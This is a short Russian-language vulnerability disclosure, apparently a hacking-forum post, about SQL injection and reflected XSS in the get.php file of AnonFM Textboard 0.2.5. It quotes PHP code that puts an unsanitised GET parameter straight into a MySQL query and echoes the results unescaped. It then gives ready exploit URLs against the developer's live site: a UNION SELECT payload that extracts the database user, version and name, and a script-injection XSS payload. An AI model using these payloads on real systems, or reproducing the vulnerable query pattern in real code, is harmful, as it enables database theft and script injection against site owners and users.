Уязвимость: SQL-Inj & pXSS Продукт: AnonFM Textboard Версия: 0.2.5 Уязвимый файл get.php Код: PHP: ... $postid1 = $_GET['id']; ... $postquery = mysql_query("SELECT message,number,postid FROM threads WHERE postid=$postid1"); $queryresult = mysql_fetch_array($postquery); if ($queryresult == '') { } else { $postid = $queryresult['postid']; echo " <td class=\"tdb1\" id=\"a" . $queryresult['number'] . "\">" . $queryresult['message'] . "</td>\n"; echo " <td class=\"tdb12\"><a class=\"green\">#" . $queryresult['number'] . "</a> (<a class=\"ilnk\" href=\"mod.php?post=0&id=$postid&postid=$postid\">Mod</a>)<br />ID: $postid1</td>"; } Пример на сайте разработчика: SQL: Code: http://www.avuc.nl/c/get.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database()),2,3--+ XSS: Code: http://www.avuc.nl/c/get.php?id=1252679693%22%3E%3Cscript%3Ealert()%3C/script%3E Пассивки там вообще везде...